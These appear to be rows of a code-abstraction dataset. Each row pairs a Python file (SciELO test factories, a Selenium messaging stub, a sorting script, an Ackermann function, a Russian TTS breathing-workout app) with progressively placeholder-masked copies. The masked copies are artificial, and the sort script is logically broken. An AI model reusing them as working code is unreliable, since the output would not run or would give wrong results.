= factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SectionTitleFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass ArticleFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass ArticleAssetFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n" ]
false
32
81dfdf0479fc1f136fa5153840d8c7015f9db676
# required !!! # pip install selenium # pip install webdriver-manager from theMachine import loops # fill the number and message # you can fill the number with array phoneNumber = "fill the number" message = "fill with ur message" loop = 1 # this how many u want to loop loops(loop, phoneNumber, message) # input how many u want to loop
[ "# required !!!\r\n# pip install selenium\r\n# pip install webdriver-manager\r\n\r\nfrom theMachine import loops\r\n\r\n# fill the number and message\r\n# you can fill the number with array\r\nphoneNumber = \"fill the number\"\r\nmessage = \"fill with ur message\"\r\nloop = 1 # this how many u want to loop\r\n\r\nloops(loop, phoneNumber, message) # input how many u want to loop\r\n", "from theMachine import loops\nphoneNumber = 'fill the number'\nmessage = 'fill with ur message'\nloop = 1\nloops(loop, phoneNumber, message)\n", "<import token>\nphoneNumber = 'fill the number'\nmessage = 'fill with ur message'\nloop = 1\nloops(loop, phoneNumber, message)\n", "<import token>\n<assignment token>\nloops(loop, phoneNumber, message)\n", "<import token>\n<assignment token>\n<code token>\n" ]
false
33
24de4f486d4e976850e94a003f8d9cbe3e518402
a= input("Enter number") a= a.split() b=[] for x in a: b.append(int(x)) print(b) l=len(b) c=0 s=0 for i in range(l): s=len(b[:i]) for j in range(s): if b[s]<b[j]: c=b[s] b.pop(s) b.insert(b.index(b[j]),c) print(b,b[:i],b[s])
[ "a= input(\"Enter number\")\r\na= a.split()\r\nb=[]\r\nfor x in a:\r\n b.append(int(x)) \r\n\r\nprint(b)\r\nl=len(b)\r\nc=0\r\ns=0\r\nfor i in range(l):\r\n s=len(b[:i])\r\n for j in range(s):\r\n \r\n if b[s]<b[j]:\r\n c=b[s]\r\n b.pop(s)\r\n b.insert(b.index(b[j]),c)\r\n print(b,b[:i],b[s])\r\n\r\n", "a = input('Enter number')\na = a.split()\nb = []\nfor x in a:\n b.append(int(x))\nprint(b)\nl = len(b)\nc = 0\ns = 0\nfor i in range(l):\n s = len(b[:i])\n for j in range(s):\n if b[s] < b[j]:\n c = b[s]\n b.pop(s)\n b.insert(b.index(b[j]), c)\n print(b, b[:i], b[s])\n", "<assignment token>\nfor x in a:\n b.append(int(x))\nprint(b)\n<assignment token>\nfor i in range(l):\n s = len(b[:i])\n for j in range(s):\n if b[s] < b[j]:\n c = b[s]\n b.pop(s)\n b.insert(b.index(b[j]), c)\n print(b, b[:i], b[s])\n", "<assignment token>\n<code token>\n<assignment token>\n<code token>\n" ]
false
34
0ecd2a298203365b20b2369a99c3c1d7c0646f19
# coding: utf-8 #ack program with the ackermann_function """ ackermann_function """ def ack(m,n): #n+1 if m = 0 if m is 0: return n + 1 #A(m−1, 1) if m > 0 and n = 0 if m > 0 and n is 0: return ack(m-1, 1) #A(m−1, A(m, n−1)) if m > 0 and n > 0 if m > 0 and n > 0: return ack(m-1, ack(m, n - 1)) if __name__ == "__main__": expected = [[1,2,3,4,5], [2,3,4,5,6], [3,5,7,9,11], [5,13,29,61,125]] ok = True for m in range(4): for n in range(5): actual = ack(m,n) if not actual == expected[m][n]: print "error" ok = False if ok: print "All tests pass"
[ "# coding: utf-8\n#ack program with the ackermann_function\n\n\"\"\" ackermann_function \"\"\"\ndef ack(m,n):\n #n+1 if m = 0\n if m is 0:\n \treturn n + 1\n #A(m−1, 1) if m > 0 and n = 0 \n if m > 0 and n is 0:\n \treturn ack(m-1, 1)\n #A(m−1, A(m, n−1)) if m > 0 and n > 0\n if m > 0 and n > 0:\n \treturn ack(m-1, ack(m, n - 1))\n\nif __name__ == \"__main__\":\n\texpected = [[1,2,3,4,5],\n\t\t\t\t[2,3,4,5,6],\n\t\t\t\t[3,5,7,9,11],\n\t\t\t\t[5,13,29,61,125]]\n\tok = True\n\tfor m in range(4):\n\t\tfor n in range(5):\n\t\t\tactual = ack(m,n)\n\t\t\tif not actual == expected[m][n]:\n\t\t\t\tprint \"error\"\n\t\t\t\tok = False\n\tif ok:\n\t\tprint \"All tests pass\"\n\n\t" ]
true
35
a98be930058269a6adbc9a28d1c0ad5d9abba136
import sys import time import pymorphy2 import pyglet import pyttsx3 import threading import warnings import pytils warnings.filterwarnings("ignore") """ Количество раундов, вдохов в раунде, задержка дыхания на вдохе""" rounds, breaths, hold = 4, 30, 13 def play_wav(src): wav = pyglet.media.load(sys.path[0] + '\\src\\wav\\' + src + '.wav') wav.play() time.sleep(wav.duration) def play_wav_inline(src): wav = pyglet.media.load(sys.path[0] + '\\src\\wav\\' + src + '.wav') wav.play() def correct_numerals(phrase, morph=pymorphy2.MorphAnalyzer()): new_phrase = [] py_gen = 1 phrase = phrase.split(' ') while phrase: word = phrase.pop(-1) if 'NUMB' in morph.parse(word)[0].tag: new_phrase.append(pytils.numeral.sum_string(int(word), py_gen)) else: new_phrase.append(word) py_gen = pytils.numeral.FEMALE if 'femn' in morph.parse(word)[0].tag else pytils.numeral.MALE return ' '.join(new_phrase[::-1]) def nums(phrase, morph=pymorphy2.MorphAnalyzer()): """ согласование существительных с числительными, стоящими перед ними """ phrase = phrase.replace(' ', ' ').replace(',', ' ,') numeral = '' new_phrase = [] for word in phrase.split(' '): if 'NUMB' in morph.parse(word)[0].tag: numeral = word if numeral: word = str(morph.parse(word)[0].make_agree_with_number(abs(int(numeral))).word) new_phrase.append(word) return ' '.join(new_phrase).replace(' ,', ',') def speak(what): speech_voice = 3 # голосовой движок rate = 120 tts = pyttsx3.init() voices = tts.getProperty("voices") tts.setProperty('rate', rate) tts.setProperty("voice", voices[speech_voice].id) print('🔊', what) what = correct_numerals(what) tts.say(what) tts.runAndWait() # tts.stop() class Workout: def __init__(self, rounds=3, breaths=30, hold=15): self.rounds = rounds self.breaths = breaths self.hold = hold self.round_times = [] self.lock = threading.Lock() # взаимоблокировка отдельных голосовых потоков def __str__(self): return '\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold) def __hold_breath(self): start_time = time.time() input() seconds = int(time.time() - start_time) mins = seconds // 60 secs = seconds % 60 self.round_times.append('{:02}:{:02}'.format(mins, secs)) play_wav_inline('inhale') self.say('Глубокий вдох. ' + nums("{} минута {} секунда".format(mins, secs))) def __clock_tick(self): for i in range(self.hold): if i < hold - 3: time.sleep(1) else: play_wav('clock') play_wav_inline('gong2') def __breathe_round(self, round): self.say('Раунд ' + str(round)) for i in range(self.breaths): if i % 10 == 0: play_wav_inline('gong') play_wav('inhale') print(i + 1, end=' ') play_wav('exhale') print() self.say('Задерживаем дыхание на выдохе') self.__hold_breath() # self.say('Держим ' + nums(str(self.hold) + ' секунда')) self.__clock_tick() play_wav_inline('exhale') self.say('Выдох') time.sleep(1) def breathe(self): self.say('Выполняем ' + nums(str(self.rounds) + ' раунд')) self.say('Каждый раунд это ' + nums(str(self.breaths) + ' глубокий вдох - и спокойный выдох')) self.say('Приготовились...') for i in range(self.rounds): self.__breathe_round(i + 1) self.say('Восстанавливаем дыхание.') def statistics(self): print('=============') for i in range(len(self.round_times)): print('Раунд', i, self.round_times[i]) print('=============') def say(self, what): self.lock.acquire() thread = threading.Thread(target=speak, kwargs={'what': what}) thread.start() thread.join() self.lock.release() workout = Workout(rounds, breaths, hold) workout.breathe() workout.statistics()
[ "import sys\nimport time\nimport pymorphy2\nimport pyglet\nimport pyttsx3\nimport threading\nimport warnings\nimport pytils\n\nwarnings.filterwarnings(\"ignore\")\n\n\"\"\" Количество раундов, вдохов в раунде, задержка дыхания на вдохе\"\"\"\nrounds, breaths, hold = 4, 30, 13\n\n\ndef play_wav(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n time.sleep(wav.duration)\n\n\ndef play_wav_inline(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n\n\ndef correct_numerals(phrase, morph=pymorphy2.MorphAnalyzer()):\n new_phrase = []\n py_gen = 1\n phrase = phrase.split(' ')\n while phrase:\n word = phrase.pop(-1)\n if 'NUMB' in morph.parse(word)[0].tag:\n new_phrase.append(pytils.numeral.sum_string(int(word), py_gen))\n else:\n new_phrase.append(word)\n py_gen = pytils.numeral.FEMALE if 'femn' in morph.parse(word)[0].tag else pytils.numeral.MALE\n return ' '.join(new_phrase[::-1])\n\n\ndef nums(phrase, morph=pymorphy2.MorphAnalyzer()):\n \"\"\" согласование существительных с числительными, стоящими перед ними \"\"\"\n phrase = phrase.replace(' ', ' ').replace(',', ' ,')\n numeral = ''\n new_phrase = []\n for word in phrase.split(' '):\n if 'NUMB' in morph.parse(word)[0].tag:\n numeral = word\n if numeral:\n word = str(morph.parse(word)[0].make_agree_with_number(abs(int(numeral))).word)\n new_phrase.append(word)\n\n return ' '.join(new_phrase).replace(' ,', ',')\n\n\ndef speak(what):\n speech_voice = 3 # голосовой движок\n rate = 120\n tts = pyttsx3.init()\n voices = tts.getProperty(\"voices\")\n tts.setProperty('rate', rate)\n tts.setProperty(\"voice\", voices[speech_voice].id)\n print('🔊', what)\n what = correct_numerals(what)\n tts.say(what)\n tts.runAndWait()\n # tts.stop()\n\n\nclass Workout:\n\n def __init__(self, rounds=3, breaths=30, hold=15):\n self.rounds = rounds\n self.breaths = breaths\n self.hold = hold\n self.round_times = []\n self.lock = threading.Lock() # взаимоблокировка отдельных голосовых потоков\n\n def __str__(self):\n return '\\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. ' + nums(\"{} минута {} секунда\".format(mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n # self.say('Держим ' + nums(str(self.hold) + ' секунда'))\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) + ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n\n def statistics(self):\n print('=============')\n for i in range(len(self.round_times)):\n print('Раунд', i, self.round_times[i])\n print('=============')\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\nworkout = Workout(rounds, breaths, hold)\nworkout.breathe()\n\nworkout.statistics()\n", "import sys\nimport time\nimport pymorphy2\nimport pyglet\nimport pyttsx3\nimport threading\nimport warnings\nimport pytils\nwarnings.filterwarnings('ignore')\n<docstring token>\nrounds, breaths, hold = 4, 30, 13\n\n\ndef play_wav(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n 